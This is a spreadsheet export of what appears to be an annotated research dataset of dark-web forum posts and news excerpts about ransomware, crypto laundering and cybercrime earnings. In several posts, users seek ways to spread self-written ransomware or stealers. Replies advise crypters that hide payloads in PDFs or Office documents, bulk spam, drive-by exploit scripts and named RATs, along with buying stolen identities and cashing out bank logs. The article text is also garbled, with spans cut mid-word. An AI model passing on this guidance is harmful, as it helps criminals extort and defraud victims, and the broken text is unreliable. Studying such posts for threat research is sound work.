laundered illegally gotten money.) another option is to convert the ransom payment to a different cryptocurrency via a crypto exchange. so-called money mules can be recruited on dark web forums and directed to withdraw bitcoins out of certain accounts.;;3. how much has been stolen this way?;;ransomware attacks took off in 2020, when victims paid more than $406 million in cryptocurrency to attackers, according to blockchain analysis firm chainanalysis inc. this year, groups had taken at least $81 million fctims as of may, the firm said. cybersecurity firms say companies have paid many millions of dollars more in ransoms that have been kept quiet. being insured against cybercrime may make victims more willing to pay ransoms if they are covered under the insurance policy. hackers who specialize in ransomware are said to be actively seeking out targets that have insurance.;;4. what did cyber thieves do before bitcoin?;;there have always been myriad ways to launder money -- that is, to obscure its roots in illegal activity. in the past, ransomware payments were delivered by money transfers through services like western union, prepaid gift cards, wiring of funds into above-board bank accounts that are quickly transfered out by the criminals, even cash in duffle bags left at designated areas for pickup.;;5. can payments made in cryptocurrency be traced?;;yes, at least at first. all bitcoin transactions, while anonymous, are available for anyone to see, so someone tracking a particular bitcoin wallet can observe when cash arrives. but accessing the money inside the wallet requires a private key, essentially a password, and that���s something ransomware groups do not normally share with anyone outside their operation.;;6. have any ransomware payments been foiled?;;yes. the u.s. federal bureau of investigation managed to recoup 63.7 of the 75 bitcoins paid by colonial pipeline co., operator of the biggest u.s. gasoline pipeline, to a russian-linked ransomware operation because it was able to track the money as it went through over a dozen transactions, and importantly, came into possession of the private key the hackers had used. (the 63.7 bitcoins were worth about $2.3 million at the time of the fbi action.) in the warrant it issued to seize funds, the fbi did not say how its agents acquired the private key.;;7. can anything else be done?;;regulation may be coming. in april, the ransomware task force, a private-public partnership created by the institute for security and technology, published an 81-page report with endations for how governments can protect against and deal with ransomware attacks. the group urged governments to extend know your customer (kyc), anti-money laundering (aml) and combating financing of terrorism (cft) requirements -- which national and international authorities enforce against banks around the world -- to crypto exchanges, kiosks (crypto���s version of automated teller machines) and over-the-counter trading desks. calls to ban bitcoin altogether have been quieted by the currency���s gradual acceptance by the financi</t>
  </si>
  <si>
    <t>da46e4171ff2f29fb3f3</t>
  </si>
  <si>
    <t>How Cryptocurrency Turbocharged the Cybercrime Racket</t>
  </si>
  <si>
    <t>{'ransomware': 9}</t>
  </si>
  <si>
    <t>;https://www.wsj.com/articles/how-dirty-money-disappears-into-the-black-hole-of-cryptocurrency-1538149743;;;how dirty money disappears into the black hole of cryptocurrency;;journal investigation documents suspicious trades through venture capital-backed shapeshift;;a north korean agent, a stolen-credit-card peddler and the mastermind of an $80 million ponzi scheme had a common problem. they needed to launder their dirty money.;;they found a common solution in shapeshift ag, an online exchange backed by established american venture-capital firms that lets people anonymously trade bitcoin, which police can track, for other digital currencies that can���t be followed.;;since bitcoin was introduced nearly 10 years ago, law-enforcement authorities have worried the technology could ease money laundering. now a new breed of cryptocurrency intermediary is giving fresh urgency to those fears, operating in plain view with scant policing and often allowing users to engage in anonymous transactions.;;a wall streetal investigation identified nearly $90 million in suspected criminal proceeds that flowed through such intermediaries over two years.;;most operate beyond the reach of u.s. authorities, with unidentified owners and addresses in places such as eastern europe and china.;;not shapeshift, the largest recipient of the funds with a u.s. presence. the company is officially registered in loosely regulated switzerland, but it is run out of a 1980s-era office building in a denver neighborhood packed with tech companies and marijuana entrepreneurs. shapeshift���s founder and chief executive, erik voorhees, along with its chief operating officer and its marketing chief, all live in the denver area.;;the company���s financial backers include pantera capital and fundersclub in california and access venture partners in colorado. partners with pantera and access said their legal reviews satisfied them that shapeshift is operating within the law. fundersclub and its partners didn���t respond to messages seekrade of suspected criminals has taken advantage of shapeshift���s services since the exchange began in 2014, according to law-enforcement officials, independent researchers and the journal���s investigation.;;after hackers believed to be from north korea extorted millions of dollars in the so-called wannacry ransomware attack on businesses and governments, the criminals used shapeshift to convert bitcoin into an untraceable cryptocurrency called monero, security researchers found. for the next year, shapeshift made no changes to its policy of not identifying its customers, and continued to process millions of dollars in criminal proceeds, according to the journal investigation.;;many cryptocurrency exchanges say they follow federal rules intended to combat money laundering, even though the question of whether they are subject to them hasn���t been tested. they keep records of their customers��� identity and monitor transactions to root out and report suspicious activity.;;mr. voorhees  constraints. ���i don���t think people should have their identity recorded to catch an occasional criminal,��� he said in a may interview.;;bitcoin and other cryptocurrencies are based on software that acts as a digital ledger maintained across thousands of computers. the ledgers, or blockchains, for most cryptocoins are publicly viewable, and allow people to track the movements of coins from one anonymous online account or wallet to the next. that anonymity can be broken, though, when a criminal trades bitcoin for dollars. bad actors must therefore figure out a way to erase traces of their crimes from their currency���s digital trail.;;to examine the scope of crypto money laundering, the journal built computer programs that tracked funds from more than 2,500 suspected investment frauds, hacks, blackmail schemes and other alleged crimes that used bitcoin and ethereum by analyzing the currencies��� underlying software.;;the journal���s analysis���which encompassed onlavior involving cryptocurrencies���identified $88.6 million laundered through 46 exchanges. many alleged perpetrators are unknown or on the run. some were arrested. a small portion of the money, less than $2 million that the journal identified, may have been seized by law enforcement in a few cases, though court filings don���t list precise amounts.;;the journal found that shapeshift processed nearly $9 million of the suspect funds, more than any other exchange with u.s. offices.;;the journal provided shapeshift with a list of the suspicious addresses it found using the exchange. in response, veronica mcgregor, who joined shapeshift last month as its chief legal officer, said the company reviewed those addresses and banned them from using the exchange.;;ms. mcgregor also said shapeshift plans to start requiring users to provide identification starting oct. 1. she said the company is doing that to ���de-risk��� itself in the face of potential new regulations and abuse by criminals, �lgulatory enforcement action.��� she said the company plans to start monitoring for and reporting potential money laundering.;;ms. mcgregor said she wants to separate mr. voorhees���s views from the company���s. ���just because it���s the personal philosophy of the ceo doesn���t mean that���s how the business is going to be run,��� she said. ���he���s not pro-money-laundering.���;;here���s how the money trail was disguised in one example the journal traced to shapeshift. an online entity calling itself starscape capital collected almost $2.2 million from investors who were promised outsize returns. investors paid starscape by depositing ethereum, the most popular cryptocurrency after bitcoin, into an anonymous wallet. starscape���s website soon went dark, and investors began complaining online about their missing money.;;ethereum, like many cryptocurrencies, has a publicly viewable ledger, even though the identity of the wallet holdeir trail before cashing out. they sent millions of dollars in ethereum to two exchanges via separate routes. one stream of money went to another anonymous wallet and onto an asian exchange called kucoin, the journal investigation found. another $517,000 went directly to shapeshift, which exchanged it for monero. at that point the trail vanished.;;the monero could then be traded for clean bitcoin or sold for hard currency without any way to trace it back to the original transaction. the starscape founders haven���t been identified.;;the 12 million-plus transactions the journal analyzed reveal numerous instances of suspicious behavior: the pseudonymous marco fike raised more than $2 million for a made-up bitcoin startup and disappeared; makoto takahashi (also an apparent alias) got nearly $600,000 to develop an online betting platform that never launched; a ���sextortion��� racket raised money blackmailing people by threatening to release explicit photos. even spoofers who robbed shapeshift�tomers by setting up a copycat shapeshift website that stole their money used the real shapeshift to launder their funds, according to publicly visible online data reviewed by the journal.;;1 /</t>
  </si>
  <si>
    <t>Post discussing how dirty money is cleaned via cryptocurrencies, using a wannacry ransomware attack as an example</t>
  </si>
  <si>
    <t>/u/Zoutje</t>
  </si>
  <si>
    <t>29/09/2018 11:52</t>
  </si>
  <si>
    <t>bd31c6146c33b17e2109</t>
  </si>
  <si>
    <t>How Dirty Money Disappears Into the Black Hole of Cryptocurrency</t>
  </si>
  <si>
    <t>13 days 11:21:00</t>
  </si>
  <si>
    <t>2 /;;mr. voorhees points out that shapeshift does offer a measure of transparency���much like bitcoin itself, it allows people to see the movement of cryptocurrency, but not to identify the owner. the exchange���s system lets people see which anonymous wallets received cryptocurrency, but in the case of monero, recipient addresses and transaction amounts remain secret and the trail is severed.;;mr. voorhees has argued that shapeshift and similar cryptocurrency exchanges that don���t take custody of customer funds shouldn���t be subject to anti-money-laundering regulations. ���this whole narrative that the government is out to protect people is total bullshit,��� he said.;;the u.s. department of treasury appears to disagree. asked at a recent event about shapeshift, kevin o���connor, an enforcement officer at treasury���s financial crimes enforcement network, said that any crypto-to-crypto exchange that has u.s. customers must comply with rules governing money tror was speaking broadly and not just in relation to shapeshift.;;other exchanges, including u.s.-based bittrex, say they follow federal guidelines. among other things, bittrex says it examines where funds originated and how many intermediary wallets they passed through before arriving.;;still, the journal found that $6.3 million in funds from apparent criminal activity flowed into bittrex. some of that was confiscated by law enforcement, for example in the case of a man who recently pleaded guilty to selling drugs and laundering money.;;europol, the european policing agency, has investigated several cases in which criminals used shapeshift, says a person close to those probes. u.s. authorities also are keenly aware of shapeshift���s role in exchanging suspicious funds, says a person with direct knowledge. ���you can only run a red light so many times before you get pulled over,��� the person says.;;lured by bitcoin���s boom, investors in europe, california and colorado looked past lega $12 million behind shapeshift. they say mr. voorhees, who says he ���would like the national government to be dissolved,��� has convinced them he is a pragmatic businessman willing to follow federal laws.;;���i trust erik. i know that erik is not a first-time entrepreneur,��� says paul veradittakit, of pantera capital, one of the most prominent crypto-focused venture funds and an investor in shapeshift. he says pantera examined the model of an instant exchange that doesn���t collect user id, and decided it was worth betting on, particularly after meeting with mr. voorhees, whom mr. veradittakit calls ���a visionary.���;;he says lawyers assured pantera that an argument could be made that a crypto-only exchange may not fall under federal financial regulations.;;mr. voorhees, a pale and slender 34-year-old, discovered bitcoin in 2011 after joining the ���free state project,��� which is trying to bring 20,000 libertarians to new hampshire in a collective effong site, satoshi dice, in 2012, which paid out in bitcoin. he also took a job at a bitcoin exchange, though it eventually closed; its founder was later convicted of money laundering.;;mr. voorhees said bitcoin could undermine the inheritance tax. ���wouldn���t it be great if you could just take the money that you were going to donate to someone, put it into a hidden form that couldn���t be confiscated and would be invisible to the authorities, and then there���s no longer a death tax?��� he asked on a 2013 panel.;;mr. voorhees sold stock in satoshi dice in exchange for bitcoin and, by his own account, moved to panama to avoid taxes. he bought back investors��� stock and sold the site for bitco</t>
  </si>
  <si>
    <t>29/09/2018 11:54</t>
  </si>
  <si>
    <t>3 /;;the u.s. securities and exchange commission later said selling stock in satoshi dice and another bitcoin company he owned were unregistered securities offerings. mr. voorhees paid a settlement of just over $50,000.;;���as much as i hated government before, then i was like, ���man, this is what these people do, go around ruining innocent people���s lives,��� ��� mr. voorhees says.;;he left panama for telluride, a colorado ski town, and decided to start his own exchange that would make money by buying cryptocurrency and reselling it at a markup.;;shapeshift launched in 2014, identifying its ceo as ���beorn gonthier������the first name from a tolkien character who shifts from man to bear���because mr. voorhees wanted anonymity, he says. when new york state initiated a ���bit license��� three years ago forcing companies to collect customer information, mr. voorhees decided shapeshift wouldn���t operate there.;;in 2016, shapeshift��fod the pseudonym and pitched established investors. pantera and a group of other funders invested $10.4 million in a new shapeshift funding round in the spring of 2017.;;soon after the venture capital came, shapeshift had its first public money-laundering problem. the wannacry attack commandeered hundreds of government and corporate computers, holding their data for bitcoin ransom. security specialists���and later federal officials���blamed north korea. researchers including priscilla moriuchi, formerly with the top-secret national security agency, started tracking wannacry���s proceeds.;;mr. voorhees says shapeshift assists law enforcement when asked, though it has limited information to share.;;after the wannacry hack, users of internet chat rooms that give advice on money laundering recommended using shapeshift to erase the trail of dirty bitcoin, the journal found via services that monitor such sites.;;in february, the journal began following money from more than 2,500 wallet addresses thchers and court records had linked to criminal activity.;;in one such case, a website belonging to btc global disappeared after raising $80 million by promising 5% weekly returns on deposits, according to an archived version of the site. south african authorities launched an investigation when investors alleged they no longer received payments and the company���s ���primary trader,��� steven twain, disappeared. the journal traced funds from btc global through intermediary wallets to shapeshift.;;the journal also traced funds from addresses provided by security consultance recorded future that were controlled by dark-web vendors advertising stolen credit cards and e-commerce accounts to shapeshift.;;centra tech inc. last year started fundraising to develop a cryptocurrency debit card. owners sohrab sharma and robert farkas claimed they had deals with visa, mastercard and bancorp. investors put in $32 million.;;the claims were false, federal prosecutors say. centra���s founders, who usedketing materials, were arrested in south florida earlier this year and charged with fraud. the two men have pleaded not guilty. a lawyer for mr. sharma declined to comment. mr. farkas���s lawyer said centra funds that went to shapeshift weren���t from investors, and weren���t sent by his client.;;while the government seized much of the money, millions had been liquidated before the arrests through exchanges including shapeshift. where the money went from</t>
  </si>
  <si>
    <t>hi everyone,;i've proudly written a metamorphic ransomware in assembly which is (as of 14/07/2021) fud and will probably be for a big while.;;anyhow, now my big problem is trying to deliver it. as we all know, microsoft did a huge crackdown on the "evil macros" on office docs about 2 months ago (i've a post regarding that if anyone wants to know more info about it). this used to be my main way of spreading any payload which went fud and wasn't too suspicious.;;so, how can i spread my malware now? sending exes in mail is frown upon by any spam agency and a plethora of alerts pop up when i do so. sending a .bat is too sketchy as well and the .lnk trick has been also fixed.;;i know that most of the big guys on the ransomware industry are using 0 day exploits, but since that isn't one of my strengths; i wondered if they had any "se" way of doing it. just anything that'll make a user execute a binary...;;tl;dr: how do people spread their malware on specific companies nowadays (excluding 0 day exploits)?</t>
  </si>
  <si>
    <t>user advertising their new ransomware (written in assembly) and requesting how they spread it</t>
  </si>
  <si>
    <t>/u/green_horse</t>
  </si>
  <si>
    <t>14/07/2021 20:10</t>
  </si>
  <si>
    <t>9845120f58c9e62fdbae</t>
  </si>
  <si>
    <t>How are the big bois doing SE payload attacks now?</t>
  </si>
  <si>
    <t>44 days 05:08:00</t>
  </si>
  <si>
    <t>on shadowy corners of the internet, you can purchase stolen credit card information, vpn access passwords, and other private information for as low as $8.;researchers at spiderlabs, the hacking and investigative unit of cybersecurity firm trustwave, claim this after conducting a thorough analysis of the prices hackers demand stolen data on the dark web.;;this week, trustwave revealed in a blog post that the team discovered a database of financial and identification documents as well as vpn access to companies that were being sold unlawfully online.;;those whose data has been hacked are being affected by this action. according to the fbi internet crime report, documented cases of credit card theft cost victims in the us around $173 million in damages in 2021.;;why sell?;;why are online criminals selling these priceless records when they can utilize the data themselves? the spiderlabs team believes that convenience and haste are the answers.;;according to the team's blog post, "criminals choose to sell credit card and driver's license information wholesale instead of to fast pay payout to avoid the time and bother necessary to use the assets.";"in general, threat actors' activity is broken down into several business sectors; some are assaulting, excavating, and selling data, while others are taking user information and exploiting it to make money. if the hacker or organization cannot utilize the information they have obtained, they sell it.;;additionally, it was discovered that most of the time, what is being sold on a forum was previously sold or utilized by a hacker, indicating that a buyer does not always receive data that has already been compromised.;along with credit card and bank account information, stolen data that was being sold on the dark web also contained social security numbers, license and passport numbers, and vpn access to companies.;bank account access and vpn;;according to spiderlabs, data that can grant access to bank accounts can cost anywhere between $100 and $3,000.;"the cost of the purchase increases as the quantity that can be taken increases. additionally, the cost is correlated with how simple it is for someone to access the bank account because some institutions may be more difficult for a thief to trick," it added.;;the costliest type of data that spiderlabs discovered being sold on the dark web was vpn login credentials.;"given what a threat actor can do once they enter an organization, this makes sense. once access is acquired, everything is possible, including financial fraud, business espionage, ip theft, malware seeding, and ransomware planting.;the search team once came across an advertisement that demanded $5,000 to get access to an anonymous business network. another demanded $2,500 in exchange for vpn credentials from a korean business with an estimated $7 billion in sales.;;even this degree of access "may not be enough to wreak catastrophic harm if a corporation has a good cybersecurity defense in place," spiderlabs stated. "in environments that are quite restrictive, employ network segmentation, and check for abnormalities, the potential to use such access for malevolent reasons will be limited.";;original - https://tape-news.net/how-cyber-terrorists-market-vpn-and-credit-card-information-on-the-dark-web;original (onion) - http://tape6m4x7swc7lwx2n2wtyccu4lt2qyahgwinx563gqfzeedn5nb4gid.onion/how-cyberterrorists-market-vpn-and-credit-card-information-on-the-dark-web</t>
  </si>
  <si>
    <t>article discussing how cybercriminals market stolen VPNs and credit card onfo on the dark web (including information taken via ransomware)</t>
  </si>
  <si>
    <t>17/08/2022 07:10</t>
  </si>
  <si>
    <t>90ba8cebcd98f0e1f94d</t>
  </si>
  <si>
    <t>How cyberterrorists market VPN and credit card information on the dark web</t>
  </si>
  <si>
    <t>from news articles;;;"having obtained a warrant, the fbi on monday seized proceeds from a digital ���wallet��� that held the ransom collected by the hackers,;;the warrant authorized seizure of 63.7 bitcoin,;;the bureau obtained the ���private key��� for the wallet address, according to an aff";;so pretty much, these private wallets do keep users keys or do did the feds build private "honey pots" wallets.;;thoughts?</t>
  </si>
  <si>
    <t>post discussing how law enforcement was able to regain the ransom gained from the colonal pipeline attack</t>
  </si>
  <si>
    <t>/u/ganjahero</t>
  </si>
  <si>
    <t>22/06/2021 20:58</t>
  </si>
  <si>
    <t>1414b31d43fbe72629e9</t>
  </si>
  <si>
    <t>How did the feds get the BTC back from pipeline ransomware attack</t>
  </si>
  <si>
    <t>12 days 01:14:00</t>
  </si>
  <si>
    <t>the amount that is paid is around 75%;;which is equivalent to what main affiliate in darkside ransomware partner program takes.;;darksupp, main coder and 'boss" of darkside, takes 25% from affiliates who are geting into corp initial acceses, making backups, using cobalt to pass av and hiting the ransomware.</t>
  </si>
  <si>
    <t>26/06/2021 04:40</t>
  </si>
  <si>
    <t>1 days 15:27:00</t>
  </si>
  <si>
    <t>everything you said makes sense for this;;i can give more info about darkside guys but dont want here so public</t>
  </si>
  <si>
    <t>26/06/2021 04:42</t>
  </si>
  <si>
    <t>possible to get $50 fullz that i can use to get $500. second of all is i'm looking for good proxies, since i am working on my own ransomware and don't want to be caught.;no feds</t>
  </si>
  <si>
    <t>post asking for cheap fullz (full information of a person) so they can use it as a proxy for building their ransomware</t>
  </si>
  <si>
    <t>/u/cIEGumuN</t>
  </si>
  <si>
    <t>17/11/2021 02:06</t>
  </si>
  <si>
    <t>5ec38c381d8cccd48913</t>
  </si>
  <si>
    <t>How do I buy affordable fullz?</t>
  </si>
  <si>
    <t>0 days 02:42:00</t>
  </si>
  <si>
    <t>hi my friend. you can buy fullz on any major dnm. just look for sellers with good feedback.;;good cheap proxies are available on the clearnet... but proxies haven't been strong enough to circumvent government surveillance for 2-3 decades... your best shot there is combining some multilayer vpns (possibly with a tor/i2p layer but that makes the whole thing so slow it's kind of impractical). i'm sure the feds were going to surveil and arrest you but thankfully your last comment prevents them from doing so... ;);;your questions make it seem like you're kind of new to all of this, so i'm going to recommend that you just use any existing ransomware. you can get that for free of course. then download a free crypter, use some fresh keys and then focus on how to spread it.</t>
  </si>
  <si>
    <t xml:space="preserve">post providing information on where to gain fullz and recommending that rather then making their own ransomware they buy raas </t>
  </si>
  <si>
    <t>/u/ph03n1x</t>
  </si>
  <si>
    <t>17/11/2021 02:21</t>
  </si>
  <si>
    <t>making use of lateral movement. for example lockbit 2.0 uses group policies to spread latteraly over compromised networks. when hacker reaches dc (domain controller) and executes malware, new group policies are made to disable any security products. it uses windows active directory api to perform ldap (lightweight directory access protocol) queries to get a list of computers, disable uac and push out malware to every device on the network.</t>
  </si>
  <si>
    <t>post describing how ransomware spreads and providing an example with lockbit</t>
  </si>
  <si>
    <t>20/09/2021 02:19</t>
  </si>
  <si>
    <t>176d79d47c3531193bcb</t>
  </si>
  <si>
    <t>How do hackers get ransomware to spread across a network?</t>
  </si>
  <si>
    <t>0 days 01:43:00</t>
  </si>
  <si>
    <t>5 days 03:27:00</t>
  </si>
  <si>
    <t>ransomware or raas ([r]ansomware [a]s [a] [s]ervice) is when a few developers develop ransomware, then pass it onto others (taking 30% or so of the profits made from the ransom) who then go and spread it through emails and exploit vulns in company networks. how it all starts is with initial access brokers who have already gotten a foothold inside of a network and they sell that access to ransomware gangs which they later use that initial access to gain access to the networks and deploy their ransomware. common lateral movement is done via rdp and once you have performed your recon and mapped out the network you deploy the ransomware.;;a cool project exists called raasnet [1] which is 'open-source ransomware as a service for linux, macos and windows'.;;[1] hxxps:(slash)(slash)github[dot]com(slash)leonv024(slash)raasnet</t>
  </si>
  <si>
    <t>post describing what raas means and how it can spread</t>
  </si>
  <si>
    <t>25/09/2021 04:03</t>
  </si>
  <si>
    <t>5 days 01:44:00</t>
  </si>
  <si>
    <t>{'ransomware': 3, 'raas': 1}</t>
  </si>
  <si>
    <t>carding : read free tutorials on forums or buy tutorials on the markets (;/d/whitehousemarket;,;/d/darkfox;,;/d/worldmarket;,;/d/dark0dereborn;,;/d/versus;...........  ) + non vbv cc (go to benumb , its a private market , need an invite code , many cc vendors buy from benumb and resell it in the markets ,  its the best cc autoshop) , find benumb invite code in the markets (do not buy from here , buy with full escrow in well known markets , check;/d/superlist;);;open vendor shop in any market , buy drugs in bulk from reputed vendors and resell it in the markets or in the street;;bank fraud , buy custom fake id + selfie to verify your account , apply for credit card / loans ............;;find email database + smtp server + ransomware ,  send thousands email to companies to spread your malware (use a crypter to make it undetectable ) , best rats : warzone , venom ) ,  find it in the markets (search ransomware , rat , malware);;ewhoring , cashout hacked paypal , cashout bank logs (wells fargo , chase , keybank , creditonebank , td , capitalone .........  find bank logs in the markets );;......... many ways;;do not answers to scammers in private messages here , many of them are scammers , buy only from the markets with full escrow !!</t>
  </si>
  <si>
    <t>User provideing some resources on how to make money via cybercrime including ransomware</t>
  </si>
  <si>
    <t>/u/Borderline999</t>
  </si>
  <si>
    <t>e962ef906d2817dc17a7</t>
  </si>
  <si>
    <t>How do i earn money quick.</t>
  </si>
  <si>
    <t>0 days 04:31:00</t>
  </si>
  <si>
    <t>19 days 04:26:00</t>
  </si>
  <si>
    <t>out of curiosity how do experienced unethical hackers make money besides malware?</t>
  </si>
  <si>
    <t>User asking how make money as an unethical hacker outside of malware</t>
  </si>
  <si>
    <t>/u/yogobro298</t>
  </si>
  <si>
    <t>24/11/2020 15:36</t>
  </si>
  <si>
    <t>b0a86354802bd136b689</t>
  </si>
  <si>
    <t>How do unethical Criminal Blackhat Hackers make money?</t>
  </si>
  <si>
    <t>5 days 07:50:00</t>
  </si>
  <si>
    <t>unethical: ransomware, db dumps, scams;ethical: bug bounties</t>
  </si>
  <si>
    <t>User stating that one way ethical hackers make money is via ransomware</t>
  </si>
  <si>
    <t>/u/NiBurn25</t>
  </si>
  <si>
    <t>24/11/2020 17:20</t>
  </si>
  <si>
    <t>0 days 01:44:00</t>
  </si>
  <si>
    <t>they mostly use ransomwares, and db datas.</t>
  </si>
  <si>
    <t>/u/lemonacid99</t>
  </si>
  <si>
    <t>25/11/2020 20:55</t>
  </si>
  <si>
    <t>0 days 19:40:00</t>
  </si>
  <si>
    <t>im interested in buying randsomware . do i just buy it will tell me how to infect peoples computers?</t>
  </si>
  <si>
    <t xml:space="preserve">User interested in buying ransomware and asking whether it has instructions on how to spread </t>
  </si>
  <si>
    <t>/u/Newcashcow</t>
  </si>
  <si>
    <t>ca78c7b5d4c59d528598</t>
  </si>
  <si>
    <t>How does randsomware work?</t>
  </si>
  <si>
    <t>1 days 13:35:00</t>
  </si>
  <si>
    <t>no, you have to do all that yourself.. and most ransomware are detected so for it to work you better off making one yourself with a exploit that no one knows about. have fun</t>
  </si>
  <si>
    <t>0 days 01:03:00</t>
  </si>
  <si>
    <t>dude you should join hacktown. funshine teaches you all about this stuff and has an arsenal of ransomware you can buy that is up to date and works. im currently learning how to hack wifi right now. doesn't cost much to join and its a lifetime membership. he has a sub here check it out.</t>
  </si>
  <si>
    <t>/u/chickenlittle142</t>
  </si>
  <si>
    <t>0 days 05:18:00</t>
  </si>
  <si>
    <t>im not researching ransom ware on the clear net</t>
  </si>
  <si>
    <t>ransomware money changed my life not drug money. i don't feel different, but i feel bad for people who struggle. i wish to donate when possible</t>
  </si>
  <si>
    <t>Thread about asking how drug money affected peoples life, user stating  it was ransomware mony that did this instead</t>
  </si>
  <si>
    <t>/u/og_kush</t>
  </si>
  <si>
    <t>27/01/2021 00:08</t>
  </si>
  <si>
    <t>/d/murderhomelesspeople</t>
  </si>
  <si>
    <t>8eaf7a9c69df1d034188</t>
  </si>
  <si>
    <t>How have your views surrounding money, the poor and world we live in change since drug money changed your life</t>
  </si>
  <si>
    <t>0 days 17:08:00</t>
  </si>
  <si>
    <t>15 days 22:24:00</t>
  </si>
  <si>
    <t>you are wrong;coru is also active, but only with interview;;on maza you have some nice ransomware groups while coru is just like discussion club of russian cybercrime veterans</t>
  </si>
  <si>
    <t>Thread providing information on what diffrent forums provide such as ransomware</t>
  </si>
  <si>
    <t>5e4ab935ed4f8c6670f7</t>
  </si>
  <si>
    <t>How much do y'all make from carding alone?</t>
  </si>
  <si>
    <t>1 days 04:15:00</t>
  </si>
  <si>
    <t>5 days 07:03:00</t>
  </si>
  <si>
    <t>hello everyone, im new in this world. i wrote a malware by himself and i want to do things more seriously instead just for learning purpuses.;;so lets say i want to spread my malware (which is able to collect credentials, cookies etc) (so basically a stealer) and my target are standard users (no big/small companies etc);;if i do everything correctly how much can i earn from that monthly?;;----- for who is in this world since time ----;;how much did you made with your own stealer / paid stealer?;;------------------------------------------------------</t>
  </si>
  <si>
    <t>User asking how much profit can be made of a malware they made</t>
  </si>
  <si>
    <t>/u/SecretMalware</t>
  </si>
  <si>
    <t>01af0b22c304346f9e89</t>
  </si>
  <si>
    <t>How much do you earn with a malware?</t>
  </si>
  <si>
    <t>18 days 17:24:00</t>
  </si>
  <si>
    <t>if you malware actually works, depending on what data it retrieves, you then have to decide whats good and whats garbage and then sell your stolen data, that it literally the only way to make money off of malware or do ransomeware or if your malware is actually good, then you can sell the malware itself and offer plans or deals.</t>
  </si>
  <si>
    <t>/u/flawlessvictory</t>
  </si>
  <si>
    <t>around 1-2k a month. btc only</t>
  </si>
  <si>
    <t>/u/skerfeyc</t>
  </si>
  <si>
    <t>0 days 01:15:00</t>
  </si>
  <si>
    <t>re evil earns millions</t>
  </si>
  <si>
    <t>they are legends, new group and team is doing good as well  since revil announced return</t>
  </si>
  <si>
    <t>ive noticed hive is coming up in a big way</t>
  </si>
  <si>
    <t>0 days 08:33:00</t>
  </si>
  <si>
    <t>{'hive': 1}</t>
  </si>
  <si>
    <t>clipboard hijacker as a ransomeare right?</t>
  </si>
  <si>
    <t>/u/30km</t>
  </si>
  <si>
    <t>26/09/2022 10:18</t>
  </si>
  <si>
    <t>18 days 06:30:00</t>
  </si>
  <si>
    <t>update edit:;video showing the result: hxxps[://]anonfiles.com/x5yff5t6u8/record_000004_avi;;---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------;;hi guys, i'm new selling, so i'm doing a research about how much would cost my ransomware tool.;;it works in client-server architecture, wrote in golang.;the client, over tls, will ask for a key to the server in order to encrypt all the;home files user;. the encrypt is in aes.;the client can implement anti-debugging, anti-vm, or both.;;the server will send to the client the key and an client id and save it.;each victim is a client, so if a company had 10 computers locked, it is 10 clients, 10 different payments.;if a company had 1000 computers locked, it is 1000 clients, 1000 different payments.;;i would like to know how much the binaries would cost and how much all the source code would cost (if i decide to sell the source).;;thanks in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Asking how much would it cost to complete and spread their new ransomware </t>
  </si>
  <si>
    <t>information (request) / raas provider (individual)</t>
  </si>
  <si>
    <t>c2bd9555aff331ea11d9</t>
  </si>
  <si>
    <t>How much would cost my ransowmare tool?</t>
  </si>
  <si>
    <t>213 days 07:19:00</t>
  </si>
  <si>
    <t>it really depends how effective it is and if it is fud. there is loads of cheap or free ransomware out there which is useless, so you would have to have proof that it works and can't be easily detected or removed for it to be worth anything.</t>
  </si>
  <si>
    <t>0 days 09:16:00</t>
  </si>
  <si>
    <t>hello,;;if i need to make money by distributing ransomware (just spread the infection) and get the % from ransom. where can i start? any suggestion would be appreciated.;;thank you</t>
  </si>
  <si>
    <t>Post asking how to partisipate in distributing ransomware for a percentage of the ransom</t>
  </si>
  <si>
    <t>information (request) / potential hacker (individual)</t>
  </si>
  <si>
    <t>/u/Irmium</t>
  </si>
  <si>
    <t>24/03/2020 17:41</t>
  </si>
  <si>
    <t>98eca35e7d157d50289e</t>
  </si>
  <si>
    <t>How to be teamed in Ransomware As A Service (RAAS) operation.</t>
  </si>
  <si>
    <t>6 days 20:11:00</t>
  </si>
  <si>
    <t>pm me;;i have few connections for ransomware as service.;also if you want i can deliver you one .exe;for which you need to fudd;;i can give you contact for fudd also;to hide it in pdf or doc;;;also i can give you sources for guys selling infects;;if you are interested pm me for jabber;;of course;i will take comission for this</t>
  </si>
  <si>
    <t>information (provider) / potential hacker (individual)</t>
  </si>
  <si>
    <t>27/03/2020 04:38</t>
  </si>
  <si>
    <t>1 days 12:04:00</t>
  </si>
  <si>
    <t>drive by exploit script;( which on 0day or damagelab goes couple of k );;and than eigher buying or making on your own backdoor on some site;;;or carding advertisment and puting there your drive by script;;;drive by scripts usually work with specific browser versions on specific os</t>
  </si>
  <si>
    <t>27/03/2020 04:39</t>
  </si>
  <si>
    <t>more simple method is fudd to doc or pdf;;and spam emails on bulk;;;or even buy infects;bunch of guys sell that</t>
  </si>
  <si>
    <t>27/03/2020 04:40</t>
  </si>
  <si>
    <t>i always thought ransomware guys must be total geeks highly literate individuals trained in every computer language,hacking infact all courses available in market.;is making ransomware command easy ?</t>
  </si>
  <si>
    <t>information (request) / debate</t>
  </si>
  <si>
    <t>/u/smogfog</t>
  </si>
  <si>
    <t>31/03/2020 12:00</t>
  </si>
  <si>
    <t>4 days 07:20:00</t>
  </si>
  <si>
    <t>the simplest is the most detectable.;actually yes, you can easily develop ransomware with a little programming skills, but if you want to improve your malware to make it undetectable, fast, to add auto-spreading or privilege escalation features etc, it will be harder.</t>
  </si>
  <si>
    <t>31/03/2020 13:50</t>
  </si>
  <si>
    <t>0 days 01:50:00</t>
  </si>
  <si>
    <t>yea thanks a ton for the info brother.</t>
  </si>
  <si>
    <t>31/03/2020 13:52</t>
  </si>
  <si>
    <t>for example, ransomware groups often have their own leak website through which you can contact them;;i could send you a list of some ransomware groups as the;/d/hacking;rules don't allow me to post them here</t>
  </si>
  <si>
    <t>Post related to contacting hacking groups, user states that most ransmware groups have their own leak website in which you can contact them</t>
  </si>
  <si>
    <t>/u/X10x0</t>
  </si>
  <si>
    <t>18/04/2022 00:48</t>
  </si>
  <si>
    <t>cbe2e671748608a02ed6</t>
  </si>
  <si>
    <t>How to contact a big hacking group?</t>
  </si>
  <si>
    <t>9 days 11:49:00</t>
  </si>
  <si>
    <t>13 days 22:56:00</t>
  </si>
  <si>
